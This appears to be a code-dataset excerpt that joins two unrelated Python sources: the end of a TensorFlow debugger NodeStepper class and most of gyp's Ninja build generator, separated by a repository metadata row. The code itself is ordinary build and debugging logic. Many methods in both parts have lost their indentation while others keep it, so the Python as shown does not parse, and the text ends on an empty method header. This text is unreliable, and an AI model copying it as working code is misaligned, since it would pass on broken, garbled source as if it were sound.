    for intermediate in to_delete_intermediates:
      del self._dumped_intermediate_tensors[intermediate]
    # The cached paths may have emptied both caches; if so, skip the walk.
    if not self._tensor_handles and not self._dumped_intermediate_tensors:
      return
    # Walk downstream through the output map built by _dfs_visit, deleting
    # every cached handle / intermediate that is reachable from the source.
    stack = [source_element]
    done = set()
    while stack:
      curr_element = stack.pop()
      done.add(curr_element)
      if (curr_element in self._tensor_handles or
          curr_element in self._dumped_intermediate_tensors):
        # Cache the invalidation path for potential future use.
        if curr_element not in self._cached_invalidation_path:
          self._cached_invalidation_path[curr_element] = set([source_element])
        else:
          self._cached_invalidation_path[curr_element].add(source_element)
        if curr_element in self._tensor_handles:
          del self._tensor_handles[curr_element]
        else:
          del self._dumped_intermediate_tensors[curr_element]
      targets = self._output_targets.get(curr_element, [])
      for target in targets:
        if target in done:
          continue
        else:
          stack.append(target)
  def finalize(self):
    """Run the final fetch(es).

    Restores the dirty variables first; the run itself uses only the
    client-supplied feed dict (overriding tensor values, cached handles and
    dumped intermediates are ignored).

    Returns:
      The same return value as self.cont() as called on the final fetch.
    """
    self.restore_variable_values()
    return self._sess.run(self._fetches, feed_dict=self._client_feed_dict)
def restore_variable_values(self):
"""Restore variables to the initial values.
"Initial value" refers to the value when this NodeStepper instance was
first constructed.
"""
for var_name in self._dirty_variables:
self._sess.run(self._variable_initializers[var_name],
feed_dict={
self._variable_initial_values[var_name]:
self._cached_variable_values[var_name]
})
def handle_names(self):
"""Return names of the TensorHandles that the debugger is holding.
Returns:
(list of str) Name of the tensors for which TensorHandle is available.
"""
return [name for name in self._tensor_handles]
def handle_node_names(self):
"""Get list of names of the nodes for which handles are available.
Returns:
(set of str) List of names of the nodes.
"""
return set([self._get_node_name(name) for name in self._tensor_handles])
def intermediate_tensor_names(self):
"""Get list of the names of the Tensors for which dumps are available.
Returns:
(list of str) List of the names of the Tensors for which intermediate
dumps are available.
"""
return self._dumped_intermediate_tensors.keys()
  def last_updated(self):
    """Get the names of the variables updated in the last cont() call.

    Returns:
      A set of the variable names updated in the previous cont() call, or
      None if no cont() call has occurred before.
    """
    return self._last_updated
  def dirty_variables(self):
    """Get the set of variables that are currently "dirty".

    "Dirty" means that a previous cont() call has updated the value of the
    Variable, and the Variable's old value (the value before any cont()
    calls happened) has not been restored.

    Returns:
      (set) A set of dirty variable names.
    """
    return self._dirty_variables
def is_placeholder(self, graph_element_name):
"""Check whether a graph element is a Placeholder, by name.
Args:
graph_element_name: (str) Name of the tensor or op to be tested.
Returns:
(bool) Whether the graph element of the specified name is a Placeholder
op or the output Tensor of a Placeholder op.
Raises:
ValueError: If graph_element_name is not in the transitive closure of the
stepper instance.
"""
node_name = self._get_node_name(graph_element_name)
if node_name not in self.sorted_nodes():
raise ValueError(
"%s is not in the transitive closure of this NodeStepper "
"instance" % graph_element_name)
graph_element = self._sess.graph.as_graph_element(graph_element_name)
if not isinstance(graph_element, ops.Operation):
graph_element = graph_element.op
return graph_element.type == "Placeholder"
def placeholders(self):
"""Get the list of Placeholder Tensors in the transitive closure.
Returns:
(list of str) A list of Placeholder Tensors or ops in the transitive
closure.
"""
placeholders = []
for item in self.sorted_nodes():
if self.is_placeholder(item):
placeholders.append(item)
return placeholders
  def get_tensor_value(self, tensor_name):
    """Get the value of a tensor that the stepper has access to.

    The lookup order is: client feed (for Placeholders), overriding values,
    cached TensorHandles, then dumped intermediate tensors.

    Args:
      tensor_name: (str) Name of the tensor.

    Returns:
      Value of the tensor, from overriding values or cached tensor handles.

    Raises:
      ValueError: If the value is not available as an overriding value
        or through a TensorHandle.
    """
    if self.is_placeholder(tensor_name):
      if ":" not in tensor_name:
        # Canonicalize a bare node name to its 0-th output tensor, which is
        # the key used in the client feed dict.
        tensor_name += ":0"
      return self._client_feed_dict[tensor_name]
    elif tensor_name in self._override_tensors:
      return self._override_tensors[tensor_name]
    elif tensor_name in self._tensor_handles:
      return self._tensor_handles[tensor_name].eval()
    elif tensor_name in self._dumped_intermediate_tensors:
      return self._dumped_intermediate_tensors[tensor_name].get_tensor()
    else:
      raise ValueError(
          "This stepper instance does not have access to the value of "
          "tensor \"%s\"" % tensor_name)
def override_names(self):
"""Return names of the TensorHandles that the debugger is holding.
Returns:
(list of str) Name of the tensor for which overriding tensor values are
available.
"""
return [name for name in self._override_tensors]
def _get_node(self, element):
"""Get the node of a graph element.
Args:
element: A graph element (Op, Tensor or Node)
Returns:
The node associated with element in the graph.
"""
node_name, _ = debug_data.parse_node_or_tensor_name(element.name)
return self._sess.graph.as_graph_element(node_name)
| mit |
maxence-diblasi/www.tropeesdeleau.fr | node_modules/node-sass/node_modules/node-gyp/gyp/pylib/gyp/generator/ninja.py | 45 | 99890 | # Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import copy
import hashlib
import json
import multiprocessing
import os.path
import re
import signal
import subprocess
import sys
import gyp
import gyp.common
from gyp.common import OrderedSet
import gyp.msvs_emulation
import gyp.MSVSUtil as MSVSUtil
import gyp.xcode_emulation
from cStringIO import StringIO
from gyp.common import GetEnvironFallback
import gyp.ninja_syntax as ninja_syntax
generator_default_variables = {
  'EXECUTABLE_PREFIX': '',
  'EXECUTABLE_SUFFIX': '',
  'STATIC_LIB_PREFIX': 'lib',
  'STATIC_LIB_SUFFIX': '.a',
  'SHARED_LIB_PREFIX': 'lib',
  # Gyp expects the following variables to be expandable by the build
  # system to the appropriate locations.  Ninja prefers paths to be
  # known at gyp time.  To resolve this, introduce special
  # variables starting with $! and $| (which begin with a $ so gyp knows it
  # should be treated specially, but is otherwise an invalid
  # ninja/shell variable) that are passed to gyp here but expanded
  # before writing out into the target .ninja files; see
  # NinjaWriter.ExpandSpecial.
  # $! is used for variables that represent a path and that can only appear at
  # the start of a string, while $| is used for variables that can appear
  # anywhere in a string.
  'INTERMEDIATE_DIR': '$!INTERMEDIATE_DIR',
  'SHARED_INTERMEDIATE_DIR': '$!PRODUCT_DIR/gen',
  'PRODUCT_DIR': '$!PRODUCT_DIR',
  'CONFIGURATION_NAME': '$|CONFIGURATION_NAME',

  # Special variables that may be used by gyp 'rule' targets.
  # We generate definitions for these variables on the fly when processing a
  # rule.
  'RULE_INPUT_ROOT': '${root}',
  'RULE_INPUT_DIRNAME': '${dirname}',
  'RULE_INPUT_PATH': '${source}',
  'RULE_INPUT_EXT': '${ext}',
  'RULE_INPUT_NAME': '${name}',
}

# Placates pylint: generators must provide these module-level attributes.
generator_additional_non_configuration_keys = []
generator_additional_path_sections = []
generator_extra_sources_for_rules = []
generator_filelist_paths = None
generator_supports_multiple_toolsets = gyp.common.CrossCompileRequested()
def StripPrefix(arg, prefix):
  """Return arg with a leading prefix removed, or arg unchanged."""
  return arg[len(prefix):] if arg.startswith(prefix) else arg
def QuoteShellArgument(arg, flavor):
  """Quote a string so the shell interprets it as a single argument."""
  # Whitelist characters known to be shell-safe rather than trying to
  # enumerate every unsafe one.
  if re.match(r'^[a-zA-Z0-9_=.\\/-]+$', arg):
    # Already safe; no quoting needed.
    return arg
  if flavor == 'win':
    return gyp.msvs_emulation.QuoteForRspFile(arg)
  # POSIX shells: wrap in single quotes. An embedded single quote becomes
  # '"'"' (close quote, double-quoted apostrophe, reopen quote).
  quoted_apostrophe = "'" + '"\'"' + "'"
  return "'" + arg.replace("'", quoted_apostrophe) + "'"
def Define(d, flavor):
  """Return a ninja- and shell-escaped -D flag for a preprocessor define."""
  if flavor == 'win':
    # cl.exe replaces literal '#' characters with '=' in preprocessor
    # definitions for some reason. Octal-encode to work around that.
    d = d.replace('#', '\\%03o' % ord('#'))
  escaped = ninja_syntax.escape('-D' + d)
  return QuoteShellArgument(escaped, flavor)
def AddArch(output, arch):
  """Insert an arch component before the extension of an output path."""
  root, extension = os.path.splitext(output)
  return root + '.' + arch + extension
class Target(object):
  """Holds the file paths produced while building a single gyp target.

  Building one target is conceptually a pipeline:

  1) actions/rules/copies generate sources/resources/etc.
  2) compilation generates .o files
  3) linking generates a binary (library/executable)
  4) bundling merges the above into a mac bundle

  (Each step is optional.)

  A dependent target usually only needs the last output of this pipeline,
  but some build steps must reach inside -- e.g. linking B requires the
  path of the static library produced by A. This object records those
  paths: member variables hold only concrete single-file paths, while
  methods compute derived values such as "the last output of the target".
  """

  def __init__(self, type):
    # Gyp type ("static_library", etc.) of this target.
    self.type = type
    # File representing whether any input dependencies necessary for
    # dependent actions have completed.
    self.preaction_stamp = None
    # File representing whether any input dependencies necessary for
    # dependent compiles have completed.
    self.precompile_stamp = None
    # File representing the completion of actions/rules/copies, if any.
    self.actions_stamp = None
    # Path to the output of the link step, if any.
    self.binary = None
    # Path to the file representing the completion of building the bundle,
    # if any.
    self.bundle = None
    # On Windows, incremental linking links against the .objs that compose
    # a .lib rather than the .lib itself; that list is stored here.
    self.component_objs = None
    # Windows only: dependents link against the import .lib (not both the
    # lib and the dll), so the import library is tracked separately.
    self.import_lib = None

  def Linkable(self):
    """Return true if this is a target that can be linked against."""
    return self.type in ('static_library', 'shared_library')

  def UsesToc(self, flavor):
    """Return true if the target should produce a restat rule based on a TOC
    file."""
    # For bundles, the .TOC should be produced for the binary, not for
    # FinalOutput(); the naive approach would put the TOC file into the
    # bundle, so bundles (and Windows) opt out for now.
    if flavor != 'win' and not self.bundle:
      return self.type in ('shared_library', 'loadable_module')
    return False

  def PreActionInput(self, flavor):
    """Return the path, if any, that dependent action steps should depend
    on."""
    final = self.FinalOutput()
    if self.UsesToc(flavor):
      return final + '.TOC'
    return final or self.preaction_stamp

  def PreCompileInput(self):
    """Return the path, if any, that dependent compile steps should depend
    on."""
    return self.actions_stamp or self.precompile_stamp

  def FinalOutput(self):
    """Return the last output of the target, which depends on all prior
    steps."""
    return self.bundle or self.binary or self.actions_stamp
# A small discourse on paths as used within the Ninja build:
# All files we produce (both at gyp and at build time) appear in the
# build directory (e.g. out/Debug).
#
# Paths within a given .gyp file are always relative to the directory
# containing the .gyp file. Call these "gyp paths". This includes
# sources as well as the starting directory a given gyp rule/action
# expects to be run from. We call the path from the source root to
# the gyp file the "base directory" within the per-.gyp-file
# NinjaWriter code.
#
# All paths as written into the .ninja files are relative to the build
# directory. Call these paths "ninja paths".
#
# We translate between these two notions of paths with two helper
# functions:
#
# - GypPathToNinja translates a gyp path (i.e. relative to the .gyp file)
# into the equivalent ninja path.
#
# - GypPathToUniqueOutput translates a gyp path into a ninja path to write
# an output file; the result can be namespaced such that it is unique
# to the input file name as well as the output target name.
class NinjaWriter(object):
  def __init__(self, hash_for_rules, target_outputs, base_dir, build_dir,
               output_file, toplevel_build, output_file_name, flavor,
               toplevel_dir=None):
    """Construct a per-.gyp-file ninja writer.

    Args:
      base_dir: path from source root to directory containing this gyp file,
                by gyp semantics, all input paths are relative to this
      build_dir: path from source root to build output
      toplevel_dir: path to the toplevel directory
    """
    self.hash_for_rules = hash_for_rules
    self.target_outputs = target_outputs
    self.base_dir = base_dir
    self.build_dir = build_dir
    self.ninja = ninja_syntax.Writer(output_file)
    self.toplevel_build = toplevel_build
    self.output_file_name = output_file_name
    self.flavor = flavor
    self.abs_build_dir = None
    if toplevel_dir is not None:
      self.abs_build_dir = os.path.abspath(os.path.join(toplevel_dir,
                                                        build_dir))
    # Object-file extension differs between MSVC and everything else.
    self.obj_ext = '.obj' if flavor == 'win' else '.o'
    if flavor == 'win':
      # See docstring of msvs_emulation.GenerateEnvironmentFiles().
      self.win_env = {}
      for arch in ('x86', 'x64'):
        self.win_env[arch] = 'environment.' + arch
    # Relative path from build output dir to base dir.
    build_to_top = gyp.common.InvertRelativePath(build_dir, toplevel_dir)
    self.build_to_base = os.path.join(build_to_top, base_dir)
    # Relative path from base dir to build dir.
    base_to_top = gyp.common.InvertRelativePath(base_dir, toplevel_dir)
    self.base_to_build = os.path.join(base_to_top, build_dir)
def ExpandSpecial(self, path, product_dir=None):
"""Expand specials like $!PRODUCT_DIR in |path|.
If |product_dir| is None, assumes the cwd is already the product
dir. Otherwise, |product_dir| is the relative path to the product
dir.
"""
PRODUCT_DIR = '$!PRODUCT_DIR'
if PRODUCT_DIR in path:
if product_dir:
path = path.replace(PRODUCT_DIR, product_dir)
else:
path = path.replace(PRODUCT_DIR + '/', '')
path = path.replace(PRODUCT_DIR + '\\', '')
path = path.replace(PRODUCT_DIR, '.')
INTERMEDIATE_DIR = '$!INTERMEDIATE_DIR'
if INTERMEDIATE_DIR in path:
int_dir = self.GypPathToUniqueOutput('gen')
# GypPathToUniqueOutput generates a path relative to the product dir,
# so insert product_dir in front if it is provided.
path = path.replace(INTERMEDIATE_DIR,
os.path.join(product_dir or '', int_dir))
CONFIGURATION_NAME = '$|CONFIGURATION_NAME'
path = path.replace(CONFIGURATION_NAME, self.config_name)
return path
def ExpandRuleVariables(self, path, root, dirname, source, ext, name):
if self.flavor == 'win':
path = self.msvs_settings.ConvertVSMacros(
path, config=self.config_name)
path = path.replace(generator_default_variables['RULE_INPUT_ROOT'], root)
path = path.replace(generator_default_variables['RULE_INPUT_DIRNAME'],
dirname)
path = path.replace(generator_default_variables['RULE_INPUT_PATH'], source)
path = path.replace(generator_default_variables['RULE_INPUT_EXT'], ext)
path = path.replace(generator_default_variables['RULE_INPUT_NAME'], name)
return path
def GypPathToNinja(self, path, env=None):
"""Translate a gyp path to a ninja path, optionally expanding environment
variable references in |path| with |env|.
See the above discourse on path conversions."""
if env:
if self.flavor == 'mac':
path = gyp.xcode_emulation.ExpandEnvVars(path, env)
elif self.flavor == 'win':
path = gyp.msvs_emulation.ExpandMacros(path, env)
if path.startswith('$!'):
expanded = self.ExpandSpecial(path)
if self.flavor == 'win':
expanded = os.path.normpath(expanded)
return expanded
if '$|' in path:
path = self.ExpandSpecial(path)
assert '$' not in path, path
return os.path.normpath(os.path.join(self.build_to_base, path))
def GypPathToUniqueOutput(self, path, qualified=True):
"""Translate a gyp path to a ninja path for writing output.
If qualified is True, qualify the resulting filename with the name
of the target. This is necessary when e.g. compiling the same
path twice for two separate output targets.
See the above discourse on path conversions."""
path = self.ExpandSpecial(path)
assert not path.startswith('$'), path
# Translate the path following this scheme:
# Input: foo/bar.gyp, target targ, references baz/out.o
# Output: obj/foo/baz/targ.out.o (if qualified)
# obj/foo/baz/out.o (otherwise)
# (and obj.host instead of obj for cross-compiles)
#
# Why this scheme and not some other one?
# 1) for a given input, you can compute all derived outputs by matching
# its path, even if the input is brought via a gyp file with '..'.
# 2) simple files like libraries and stamps have a simple filename.
obj = 'obj'
if self.toolset != 'target':
obj += '.' + self.toolset
path_dir, path_basename = os.path.split(path)
assert not os.path.isabs(path_dir), (
"'%s' can not be absolute path (see crbug.com/462153)." % path_dir)
if qualified:
path_basename = self.name + '.' + path_basename
return os.path.normpath(os.path.join(obj, self.base_dir, path_dir,
path_basename))
def WriteCollapsedDependencies(self, name, targets, order_only=None):
"""Given a list of targets, return a path for a single file
representing the result of building all the targets or None.
Uses a stamp file if necessary."""
assert targets == filter(None, targets), targets
if len(targets) == 0:
assert not order_only
return None
if len(targets) > 1 or order_only:
stamp = self.GypPathToUniqueOutput(name + '.stamp')
targets = self.ninja.build(stamp, 'stamp', targets, order_only=order_only)
self.ninja.newline()
return targets[0]
def _SubninjaNameForArch(self, arch):
output_file_base = os.path.splitext(self.output_file_name)[0]
return '%s.%s.ninja' % (output_file_base, arch)
  def WriteSpec(self, spec, config_name, generator_flags):
    """The main entry point for NinjaWriter: write the build rules for a spec.

    Returns a Target object, which represents the output paths for this spec.
    Returns None if there are no outputs (e.g. a settings-only 'none' type
    target).

    spec: the gyp target dict for this target.
    config_name: name of the configuration being generated.
    generator_flags: generator-specific flags dict (consulted on Windows).
    """
    # Per-target state used by the helper methods called below.
    self.config_name = config_name
    self.name = spec['target_name']
    self.toolset = spec['toolset']
    config = spec['configurations'][config_name]
    self.target = Target(spec['type'])
    self.is_standalone_static_library = bool(
        spec.get('standalone_static_library', 0))
    # Track if this target contains any C++ files, to decide if gcc or g++
    # should be used for linking.
    self.uses_cpp = False
    self.is_mac_bundle = gyp.xcode_emulation.IsMacBundle(self.flavor, spec)
    self.xcode_settings = self.msvs_settings = None
    if self.flavor == 'mac':
      self.xcode_settings = gyp.xcode_emulation.XcodeSettings(spec)
    if self.flavor == 'win':
      self.msvs_settings = gyp.msvs_emulation.MsvsSettings(spec,
                                                           generator_flags)
      # Point the generic tool variables at the arch-specific compiler,
      # assembler, and environment file for this configuration's arch.
      arch = self.msvs_settings.GetArch(config_name)
      self.ninja.variable('arch', self.win_env[arch])
      self.ninja.variable('cc', '$cl_' + arch)
      self.ninja.variable('cxx', '$cl_' + arch)
      self.ninja.variable('cc_host', '$cl_' + arch)
      self.ninja.variable('cxx_host', '$cl_' + arch)
      self.ninja.variable('asm', '$ml_' + arch)
    if self.flavor == 'mac':
      self.archs = self.xcode_settings.GetActiveArchs(config_name)
      if len(self.archs) > 1:
        # Fat binaries: each arch's compile/link edges go into a separate
        # subninja file next to the main one.
        self.arch_subninjas = dict(
            (arch, ninja_syntax.Writer(
                OpenOutput(os.path.join(self.toplevel_build,
                                        self._SubninjaNameForArch(arch)),
                           'w')))
            for arch in self.archs)
    # Compute predepends for all rules.
    # actions_depends is the dependencies this target depends on before running
    # any of its action/rule/copy steps.
    # compile_depends is the dependencies this target depends on before running
    # any of its compile steps.
    actions_depends = []
    compile_depends = []
    # TODO(evan): it is rather confusing which things are lists and which
    # are strings.  Fix these.
    if 'dependencies' in spec:
      for dep in spec['dependencies']:
        if dep in self.target_outputs:
          target = self.target_outputs[dep]
          actions_depends.append(target.PreActionInput(self.flavor))
          compile_depends.append(target.PreCompileInput())
      actions_depends = filter(None, actions_depends)
      compile_depends = filter(None, compile_depends)
      # Collapse each dependency list to at most one stamp path.
      actions_depends = self.WriteCollapsedDependencies('actions_depends',
                                                        actions_depends)
      compile_depends = self.WriteCollapsedDependencies('compile_depends',
                                                        compile_depends)
      self.target.preaction_stamp = actions_depends
      self.target.precompile_stamp = compile_depends
    # Write out actions, rules, and copies.  These must happen before we
    # compile any sources, so compute a list of predependencies for sources
    # while we do it.
    extra_sources = []
    mac_bundle_depends = []
    self.target.actions_stamp = self.WriteActionsRulesCopies(
        spec, extra_sources, actions_depends, mac_bundle_depends)
    # If we have actions/rules/copies, we depend directly on those, but
    # otherwise we depend on dependent target's actions/rules/copies etc.
    # We never need to explicitly depend on previous target's link steps,
    # because no compile ever depends on them.
    compile_depends_stamp = (self.target.actions_stamp or compile_depends)
    # Write out the compilation steps, if any.
    link_deps = []
    sources = extra_sources + spec.get('sources', [])
    if sources:
      if self.flavor == 'mac' and len(self.archs) > 1:
        # Write subninja file containing compile and link commands scoped to
        # a single arch if a fat binary is being built.
        for arch in self.archs:
          self.ninja.subninja(self._SubninjaNameForArch(arch))
      pch = None
      if self.flavor == 'win':
        gyp.msvs_emulation.VerifyMissingSources(
            sources, self.abs_build_dir, generator_flags, self.GypPathToNinja)
        pch = gyp.msvs_emulation.PrecompiledHeader(
            self.msvs_settings, config_name, self.GypPathToNinja,
            self.GypPathToUniqueOutput, self.obj_ext)
      else:
        pch = gyp.xcode_emulation.MacPrefixHeader(
            self.xcode_settings, self.GypPathToNinja,
            lambda path, lang: self.GypPathToUniqueOutput(path + '-' + lang))
      link_deps = self.WriteSources(
          self.ninja, config_name, config, sources, compile_depends_stamp, pch,
          spec)
      # Some actions/rules output 'sources' that are already object files.
      obj_outputs = [f for f in sources if f.endswith(self.obj_ext)]
      if obj_outputs:
        if self.flavor != 'mac' or len(self.archs) == 1:
          link_deps += [self.GypPathToNinja(o) for o in obj_outputs]
        else:
          print "Warning: Actions/rules writing object files don't work with " \
              "multiarch targets, dropping. (target %s)" % spec['target_name']
      elif self.flavor == 'mac' and len(self.archs) > 1:
        # No sources compiled, but multiarch: keep the per-arch dict shape
        # that WriteLink expects.
        link_deps = collections.defaultdict(list)
    if self.flavor == 'win' and self.target.type == 'static_library':
      self.target.component_objs = link_deps
    # Write out a link step, if needed.
    output = None
    is_empty_bundle = not link_deps and not mac_bundle_depends
    if link_deps or self.target.actions_stamp or actions_depends:
      output = self.WriteTarget(spec, config_name, config, link_deps,
                                self.target.actions_stamp or actions_depends)
      if self.is_mac_bundle:
        mac_bundle_depends.append(output)
    # Bundle all of the above together, if needed.
    if self.is_mac_bundle:
      output = self.WriteMacBundle(spec, mac_bundle_depends, is_empty_bundle)
    if not output:
      return None
    assert self.target.FinalOutput(), output
    return self.target
def _WinIdlRule(self, source, prebuild, outputs):
"""Handle the implicit VS .idl rule for one source file. Fills |outputs|
with files that are generated."""
outdir, output, vars, flags = self.msvs_settings.GetIdlBuildData(
source, self.config_name)
outdir = self.GypPathToNinja(outdir)
def fix_path(path, rel=None):
path = os.path.join(outdir, path)
dirname, basename = os.path.split(source)
root, ext = os.path.splitext(basename)
path = self.ExpandRuleVariables(
path, root, dirname, source, ext, basename)
if rel:
path = os.path.relpath(path, rel)
return path
vars = [(name, fix_path(value, outdir)) for name, value in vars]
output = [fix_path(p) for p in output]
vars.append(('outdir', outdir))
vars.append(('idlflags', flags))
input = self.GypPathToNinja(source)
self.ninja.build(output, 'idl', input,
variables=vars, order_only=prebuild)
outputs.extend(output)
def WriteWinIdlFiles(self, spec, prebuild):
"""Writes rules to match MSVS's implicit idl handling."""
assert self.flavor == 'win'
if self.msvs_settings.HasExplicitIdlRulesOrActions(spec):
return []
outputs = []
for source in filter(lambda x: x.endswith('.idl'), spec['sources']):
self._WinIdlRule(source, prebuild, outputs)
return outputs
  def WriteActionsRulesCopies(self, spec, extra_sources, prebuild,
                              mac_bundle_depends):
    """Write out the Actions, Rules, and Copies steps.  Return a path
    representing the outputs of these steps.

    extra_sources: list, mutated; receives outputs flagged as sources.
    prebuild: stamp/path these steps must wait on before running.
    mac_bundle_depends: list, mutated; receives bundle dependencies.
    """
    outputs = []
    if self.is_mac_bundle:
      # Copy the list: WriteRules removes resources it consumes as inputs.
      mac_bundle_resources = spec.get('mac_bundle_resources', [])[:]
    else:
      mac_bundle_resources = []
    extra_mac_bundle_resources = []
    if 'actions' in spec:
      outputs += self.WriteActions(spec['actions'], extra_sources, prebuild,
                                   extra_mac_bundle_resources)
    if 'rules' in spec:
      outputs += self.WriteRules(spec['rules'], extra_sources, prebuild,
                                 mac_bundle_resources,
                                 extra_mac_bundle_resources)
    if 'copies' in spec:
      outputs += self.WriteCopies(spec['copies'], prebuild, mac_bundle_depends)
    if 'sources' in spec and self.flavor == 'win':
      # MSVS builds .idl files implicitly; mirror that behavior here.
      outputs += self.WriteWinIdlFiles(spec, prebuild)
    # Collapse all outputs into a single stamp, if more than one.
    stamp = self.WriteCollapsedDependencies('actions_rules_copies', outputs)
    if self.is_mac_bundle:
      xcassets = self.WriteMacBundleResources(
          extra_mac_bundle_resources + mac_bundle_resources, mac_bundle_depends)
      partial_info_plist = self.WriteMacXCassets(xcassets, mac_bundle_depends)
      self.WriteMacInfoPlist(partial_info_plist, mac_bundle_depends)
    return stamp
def GenerateDescription(self, verb, message, fallback):
"""Generate and return a description of a build step.
|verb| is the short summary, e.g. ACTION or RULE.
|message| is a hand-written description, or None if not available.
|fallback| is the gyp-level name of the step, usable as a fallback.
"""
if self.toolset != 'target':
verb += '(%s)' % self.toolset
if message:
return '%s %s' % (verb, self.ExpandSpecial(message))
else:
return '%s %s: %s' % (verb, self.name, fallback)
  def WriteActions(self, actions, extra_sources, prebuild,
                   extra_mac_bundle_resources):
    """Write one ninja rule + build edge per gyp 'action'.

    Returns the list of all action output paths.  |extra_sources| and
    |extra_mac_bundle_resources| are mutated when an action flags its
    outputs via process_outputs_as_[mac_bundle_]sources/resources.
    """
    # Actions cd into the base directory.
    env = self.GetToolchainEnv()
    all_outputs = []
    for action in actions:
      # First write out a rule for the action.
      name = '%s_%s' % (action['action_name'], self.hash_for_rules)
      description = self.GenerateDescription('ACTION',
                                             action.get('message', None),
                                             name)
      is_cygwin = (self.msvs_settings.IsRuleRunUnderCygwin(action)
                   if self.flavor == 'win' else False)
      args = action['action']
      depfile = action.get('depfile', None)
      if depfile:
        depfile = self.ExpandSpecial(depfile, self.base_to_build)
      pool = 'console' if int(action.get('ninja_use_console', 0)) else None
      rule_name, _ = self.WriteNewNinjaRule(name, args, description,
                                            is_cygwin, env, pool,
                                            depfile=depfile)
      inputs = [self.GypPathToNinja(i, env) for i in action['inputs']]
      # Reclassify outputs if the action asks for it (values may be 0/1
      # strings from the gyp file, hence the int() coercion).
      if int(action.get('process_outputs_as_sources', False)):
        extra_sources += action['outputs']
      if int(action.get('process_outputs_as_mac_bundle_resources', False)):
        extra_mac_bundle_resources += action['outputs']
      outputs = [self.GypPathToNinja(o, env) for o in action['outputs']]
      # Then write out an edge using the rule.
      self.ninja.build(outputs, rule_name, inputs,
                       order_only=prebuild)
      all_outputs += outputs
      self.ninja.newline()
    return all_outputs
  def WriteRules(self, rules, extra_sources, prebuild,
                 mac_bundle_resources, extra_mac_bundle_resources):
    """Write one ninja rule + per-source build edges per gyp 'rule'.

    Returns the list of all generated output paths.  |extra_sources|,
    |mac_bundle_resources| and |extra_mac_bundle_resources| are mutated as
    rule outputs are reclassified as sources/resources.
    """
    env = self.GetToolchainEnv()
    all_outputs = []
    for rule in rules:
      # Skip a rule with no action and no inputs.
      if 'action' not in rule and not rule.get('rule_sources', []):
        continue
      # First write out a rule for the rule action.
      name = '%s_%s' % (rule['rule_name'], self.hash_for_rules)
      args = rule['action']
      description = self.GenerateDescription(
          'RULE',
          rule.get('message', None),
          ('%s ' + generator_default_variables['RULE_INPUT_PATH']) % name)
      is_cygwin = (self.msvs_settings.IsRuleRunUnderCygwin(rule)
                   if self.flavor == 'win' else False)
      pool = 'console' if int(rule.get('ninja_use_console', 0)) else None
      rule_name, args = self.WriteNewNinjaRule(
          name, args, description, is_cygwin, env, pool)
      # TODO: if the command references the outputs directly, we should
      # simplify it to just use $out.
      # Rules can potentially make use of some special variables which
      # must vary per source file.
      # Compute the list of variables we'll need to provide.
      special_locals = ('source', 'root', 'dirname', 'ext', 'name')
      needed_variables = set(['source'])
      for argument in args:
        for var in special_locals:
          if '${%s}' % var in argument:
            needed_variables.add(var)
      def cygwin_munge(path):
        # Cygwin tools expect forward slashes; the closure reads the current
        # loop iteration's is_cygwin on purpose.
        # pylint: disable=cell-var-from-loop
        if is_cygwin:
          return path.replace('\\', '/')
        return path
      inputs = [self.GypPathToNinja(i, env) for i in rule.get('inputs', [])]
      # If there are n source files matching the rule, and m additional rule
      # inputs, then adding 'inputs' to each build edge written below will
      # write m * n inputs. Collapsing reduces this to m + n.
      sources = rule.get('rule_sources', [])
      num_inputs = len(inputs)
      if prebuild:
        num_inputs += 1
      if num_inputs > 2 and len(sources) > 2:
        inputs = [self.WriteCollapsedDependencies(
            rule['rule_name'], inputs, order_only=prebuild)]
        prebuild = []
      # For each source file, write an edge that generates all the outputs.
      for source in sources:
        source = os.path.normpath(source)
        dirname, basename = os.path.split(source)
        root, ext = os.path.splitext(basename)
        # Gather the list of inputs and outputs, expanding $vars if possible.
        outputs = [self.ExpandRuleVariables(o, root, dirname,
                                            source, ext, basename)
                   for o in rule['outputs']]
        if int(rule.get('process_outputs_as_sources', False)):
          extra_sources += outputs
        was_mac_bundle_resource = source in mac_bundle_resources
        if was_mac_bundle_resource or \
            int(rule.get('process_outputs_as_mac_bundle_resources', False)):
          extra_mac_bundle_resources += outputs
        # Note: This is n_resources * n_outputs_in_rule.  Put to-be-removed
        # items in a set and remove them all in a single pass if this becomes
        # a performance issue.
        if was_mac_bundle_resource:
          mac_bundle_resources.remove(source)
        extra_bindings = []
        for var in needed_variables:
          if var == 'root':
            extra_bindings.append(('root', cygwin_munge(root)))
          elif var == 'dirname':
            # '$dirname' is a parameter to the rule action, which means
            # it shouldn't be converted to a Ninja path.  But we don't
            # want $!PRODUCT_DIR in there either.
            dirname_expanded = self.ExpandSpecial(dirname, self.base_to_build)
            extra_bindings.append(('dirname', cygwin_munge(dirname_expanded)))
          elif var == 'source':
            # '$source' is a parameter to the rule action, which means
            # it shouldn't be converted to a Ninja path.  But we don't
            # want $!PRODUCT_DIR in there either.
            source_expanded = self.ExpandSpecial(source, self.base_to_build)
            extra_bindings.append(('source', cygwin_munge(source_expanded)))
          elif var == 'ext':
            extra_bindings.append(('ext', ext))
          elif var == 'name':
            extra_bindings.append(('name', cygwin_munge(basename)))
          else:
            # Unreachable unless special_locals gains an unhandled entry.
            assert var == None, repr(var)
        outputs = [self.GypPathToNinja(o, env) for o in outputs]
        if self.flavor == 'win':
          # WriteNewNinjaRule uses unique_name for creating an rsp file on win.
          extra_bindings.append(('unique_name',
                                 hashlib.md5(outputs[0]).hexdigest()))
        self.ninja.build(outputs, rule_name, self.GypPathToNinja(source),
                         implicit=inputs,
                         order_only=prebuild,
                         variables=extra_bindings)
        all_outputs.extend(outputs)
    return all_outputs
def WriteCopies(self, copies, prebuild, mac_bundle_depends):
outputs = []
env = self.GetToolchainEnv()
for copy in copies:
for path in copy['files']:
# Normalize the path so trailing slashes don't confuse us.
path = os.path.normpath(path)
basename = os.path.split(path)[1]
src = self.GypPathToNinja(path, env)
dst = self.GypPathToNinja(os.path.join(copy['destination'], basename),
env)
outputs += self.ninja.build(dst, 'copy', src, order_only=prebuild)
if self.is_mac_bundle:
# gyp has mac_bundle_resources to copy things into a bundle's
# Resources folder, but there's no built-in way to copy files to other
# places in the bundle. Hence, some targets use copies for this. Check
# if this file is copied into the current bundle, and if so add it to
# the bundle depends so that dependent targets get rebuilt if the copy
# input changes.
if dst.startswith(self.xcode_settings.GetBundleContentsFolderPath()):
mac_bundle_depends.append(dst)
return outputs
def WriteMacBundleResources(self, resources, bundle_depends):
